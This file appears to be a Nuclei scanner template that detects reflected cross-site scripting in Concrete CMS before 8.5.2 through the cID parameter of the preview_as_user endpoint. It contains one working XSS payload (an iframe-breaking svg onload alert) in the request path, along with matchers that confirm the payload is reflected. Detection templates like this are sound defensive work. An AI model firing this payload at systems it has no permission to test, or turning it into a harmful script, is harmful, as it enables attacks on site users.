concretexss.yaml

d: concrete-xss

info:
  author: shifacyclewla,hackergautam
  description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
  name: Unauthenticated reflected XSS in preview_as_user function
  severity: medium
  tags: concrete,xss,cms
  reference: |
      - https://hackerone.com/reports/643442
      - https://github.com/concrete5/concrete5/pull/7999
      - https://twitter.com/JacksonHHax/status/1389222207805661187

requests:
  - method: GET
    path:
      - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</iframe><svg/onload=alert("{{randstr}}")>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200